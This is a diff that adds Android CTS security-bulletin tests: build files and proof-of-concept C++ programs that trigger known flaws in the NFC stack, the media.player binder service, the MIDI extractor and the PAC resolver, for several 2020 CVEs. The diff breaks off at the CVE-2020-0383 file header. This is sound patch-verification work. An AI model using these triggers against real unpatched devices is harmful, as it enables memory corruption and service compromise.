diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp
new file mode 100644
index 0000000..27acfe3
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+#include <dlfcn.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+// borrowed from rw_i93.cc
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+bool kIsInitialized = false;
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */
+ RW_I93_STATE_IDLE, /* waiting for upper layer API */
+ RW_I93_STATE_BUSY, /* waiting for response from tag */
+
+ RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */
+ RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */
+ RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */
+ RW_I93_STATE_FORMAT, /* performing format procedure */
+ RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */
+
+ RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */
+ RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */
+ RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */
+ RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */
+ RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */
+
+ RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */
+ RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */
+
+ RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+ RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */
+ RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+ */
+
+ RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */
+ RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */
+ RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */
+};
+
+static void *(*real_GKI_getbuf)(uint16_t size) = nullptr;
+static void (*real_GKI_freebuf)(void *ptr) = nullptr;
+
+void init(void) {
+ real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft");
+ if (!real_GKI_getbuf) {
+ return;
+ }
+
+ real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
+ if (!real_GKI_freebuf) {
+ return;
+ }
+
+ kIsInitialized = true;
+}
+
+void *GKI_getbuf(uint16_t size) {
+ if (!kIsInitialized) {
+ init();
+ }
+ return malloc(size);
+}
+
+void GKI_freebuf(void *ptr) {
+ if (!kIsInitialized) {
+ init();
+ }
+ free(ptr);
+}
+
+int main() {
+ tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16);
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+ p_i93->state = RW_I93_STATE_UPDATE_NDEF;
+ p_i93->sub_state = RW_I93_SUBSTATE_RESET_LEN;
+ p_i93->block_size = 30;
+
+ enable_selective_overload = ENABLE_ALL;
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR));
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_NONE;
+
+ (p_data->data.p_data)->len = 10;
+ p_data->data.p_data->offset = 0;
+ p_data->status = NFC_STATUS_OK;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp
new file mode 100644
index 0000000..16dac28
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0039",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp
new file mode 100644
index 0000000..6ebc3f3
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp
@@ -0,0 +1,148 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+#include <dlfcn.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+// borrowed from rw_i93.cc
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+bool kIsInitialized = false;
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */
+ RW_I93_STATE_IDLE, /* waiting for upper layer API */
+ RW_I93_STATE_BUSY, /* waiting for response from tag */
+
+ RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */
+ RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */
+ RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */
+ RW_I93_STATE_FORMAT, /* performing format procedure */
+ RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */
+
+ RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */
+ RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */
+ RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */
+ RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */
+ RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */
+
+ RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */
+ RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */
+
+ RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+ RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */
+ RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+ */
+
+ RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */
+ RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */
+ RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */
+};
+
+static void *(*real_GKI_getbuf)(uint16_t size) = nullptr;
+static void (*real_GKI_freebuf)(void *ptr) = nullptr;
+
+void init(void) {
+ real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft");
+ if (!real_GKI_getbuf) {
+ return;
+ }
+
+ real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
+ if (!real_GKI_freebuf) {
+ return;
+ }
+
+ kIsInitialized = true;
+}
+
+void *GKI_getbuf(uint16_t size) {
+ if (!kIsInitialized) {
+ init();
+ }
+ return malloc(size);
+}
+
+void GKI_freebuf(void *ptr) {
+ if (!kIsInitialized) {
+ init();
+ }
+ free(ptr);
+}
+
+int main() {
+ tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16);
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+ p_i93->state = RW_I93_STATE_UPDATE_NDEF;
+ p_i93->sub_state = RW_I93_SUBSTATE_UPDATE_LEN;
+ p_i93->block_size = 30;
+ p_i93->rw_length = 1;
+
+ enable_selective_overload = ENABLE_ALL;
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR));
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_NONE;
+
+ (p_data->data.p_data)->len = 10;
+ p_data->data.p_data->offset = 0;
+ p_data->status = NFC_STATUS_OK;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp
new file mode 100644
index 0000000..cbe6a4e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2020-0073",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/include",
+ "system/nfc/src/gki/ulinux",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp
new file mode 100644
index 0000000..d6ea446
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include <nfc_api.h>
+#include <rw_int.h>
+
+extern tRW_CB rw_cb;
+void rw_init(void);
+void rw_t2t_handle_rsp(uint8_t* p_data);
+void poc_cback(tRW_EVENT event, tRW_DATA* p_rw_data) {
+ (void)event;
+ (void)p_rw_data;
+}
+
+int main() {
+ tRW_T2T_CB* p_t2t = &rw_cb.tcb.t2t;
+ rw_init();
+ rw_cb.p_cback = &poc_cback;
+ p_t2t->state = RW_T2T_STATE_DETECT_TLV;
+ p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV;
+ p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE;
+ p_t2t->found_tlv = TAG_LOCK_CTRL_TLV;
+ p_t2t->bytes_count = 1;
+ p_t2t->num_lockbytes = RW_T2T_MAX_LOCK_BYTES;
+ uint8_t data[T2T_READ_DATA_LEN];
+ rw_t2t_handle_rsp(data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0240/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0240/Android.bp
new file mode 100644
index 0000000..d626fcc
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0240/Android.bp
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0240",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ include_dirs: [
+ "external/chromium-libpac/includes",
+ ],
+ shared_libs: [
+ "libpac",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0240/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0240/poc.cpp
new file mode 100644
index 0000000..61e5e9f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0240/poc.cpp
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <codecvt>
+#include <fstream>
+#include <iostream>
+#include <proxy_resolver_v8_wrapper.h>
+#include <string.h>
+#include <sys/types.h>
+
+const char16_t *spec = u"";
+const char16_t *host = u"";
+
+int main(int argc, char *argv[]) {
+ if (argc != 2) {
+ return EXIT_FAILURE;
+ }
+
+ ProxyResolverV8Handle *handle = ProxyResolverV8Handle_new();
+
+ std::ifstream t;
+ t.open(argv[1]);
+ if (t.rdstate() != std::ifstream::goodbit) {
+ return EXIT_FAILURE;
+ }
+ t.seekg(0, std::ios::end);
+ size_t size = t.tellg();
+ char *raw = (char *)calloc(size + 1, sizeof(char));
+ t.seekg(0);
+ t.read(raw, size);
+ std::string u8Script(raw);
+ std::u16string u16Script =
+ std::wstring_convert<std::codecvt_utf8_utf16<char16_t>, char16_t>{}
+ .from_bytes(u8Script);
+
+ ProxyResolverV8Handle_SetPacScript(handle, u16Script.data());
+ ProxyResolverV8Handle_GetProxyForURL(handle, spec, host);
+
+ ProxyResolverV8Handle_delete(handle);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp
new file mode 100644
index 0000000..f45207f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0243",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libutils",
+ "libbinder",
+ "libutilscallstack",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp
new file mode 100644
index 0000000..5841427
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp
@@ -0,0 +1,97 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+
+#include "../includes/common.h"
+
+using namespace android;
+
+typedef struct ThreadParams {
+ sp<IBinder> service;
+} ThreadParams;
+
+static void *thread_getParameter(void *p) {
+ ThreadParams *params = (ThreadParams *)p;
+ int err;
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ Parcel data, reply;
+ data.writeInterfaceToken(params->service->getInterfaceDescriptor());
+ int key = (('m') << 24 | ('t') << 16 | ('r') << 8 | ('X'));
+ data.writeInt32(key);
+ err = params->service->transact(/*GET_PARAMETER_ID*/ 31, data, &reply, 0);
+ if (err == EPIPE) {
+ break;
+ }
+ usleep(5000);
+ }
+ return nullptr;
+}
+
+int main() {
+ status_t err;
+ sp<IServiceManager> sm = defaultServiceManager();
+ String16 name(String16("media.player"));
+ sp<IBinder> service = sm->checkService(name);
+ sp<IBinder> binder = nullptr;
+ if (not service) {
+ return EXIT_FAILURE;
+ }
+
+ String16 interface_name = service->getInterfaceDescriptor();
+ Parcel data, reply;
+ data.writeInterfaceToken(interface_name);
+ data.writeStrongBinder(new BBinder());
+ for (int i = 0; i < 1024; ++i)
+ data.writeInt32(1);
+ if (service) {
+ err = service->transact(/*CREATE_ID*/ 1, data, &reply, 0);
+ binder = reply.readStrongBinder();
+ }
+
+ if (not binder) {
+ return EXIT_FAILURE;
+ }
+
+ pthread_t t1, t2;
+
+ ThreadParams *params = new ThreadParams();
+ params->service = binder;
+ pthread_create(&t1, nullptr, thread_getParameter, params);
+ pthread_create(&t2, nullptr, thread_getParameter, params);
+
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ if (not binder) {
+ break;
+ }
+ Parcel data, reply;
+ data.writeInterfaceToken(binder->getInterfaceDescriptor());
+ data.writeStrongBinder(binder);
+ err = binder->transact(/*SET_DATA_SOURCE_URL_ID*/ 2, data, &reply, 0);
+ if (err == EPIPE) {
+ break;
+ }
+ usleep(500000);
+ }
+
+ pthread_join(t1, nullptr);
+ pthread_join(t2, nullptr);
+ delete params;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp
new file mode 100644
index 0000000..9f254e3
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0381",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libmedia/include/android",
+ "frameworks/av/media/libmedia/include",
+ "frameworks/av/media/libstagefright/foundation/include",
+ "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation",
+ "frameworks/av/media/libstagefright/include",
+ "frameworks/av/media/libstagefright/include/media/stagefright",
+ ],
+ shared_libs: [
+ "libutils",
+ "libmediandk",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp
new file mode 100644
index 0000000..43da25d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+ int mFdData;
+ int mFdInfo;
+ XMFDataSource(int fdData, int fdInfo) {
+ mFdData = fdData;
+ mFdInfo = fdInfo;
+ }
+
+ ~XMFDataSource() = default;
+
+ virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+ size_t size) {
+ uint32_t infoOffset, infoSize;
+ read(mFdInfo, &infoSize, sizeof(int32_t));
+ read(mFdInfo, &infoOffset, sizeof(int32_t));
+ lseek(mFdData, infoOffset, SEEK_SET);
+ read(mFdData, data, infoSize);
+ return size;
+ }
+
+ virtual status_t getSize(off64_t *size) {
+ *size = 0x10000;
+ return 0;
+ }
+ virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+ if (fdData >= 0) {
+ ::close(fdData);
+ }
+ if (fdInfo >= 0) {
+ ::close(fdInfo);
+ }
+ if (libHandle) {
+ dlclose(libHandle);
+ }
+}
+
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+
+ GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ int fdData = open(argv[1], O_RDONLY);
+ if (fdData < 0) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ int fdInfo = open(argv[2], O_RDONLY);
+ if (fdInfo < 0) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+ if (!dataSource) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+
+ float confidence = 0.0f;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ }
+
+ close_resources(fdData, fdInfo, libHandle);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp
new file mode 100644
index 0000000..1965f50
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0383",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libmedia/include",
+ "frameworks/av/media/libmedia/include/android",
+ "frameworks/av/media/libstagefright/include",
+ "frameworks/av/media/libstagefright/foundation/include",
+ ],
+ shared_libs: [
+ "libutils",
+ "libmediandk",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp
new file mode 100644
index 0000000..313f21a7
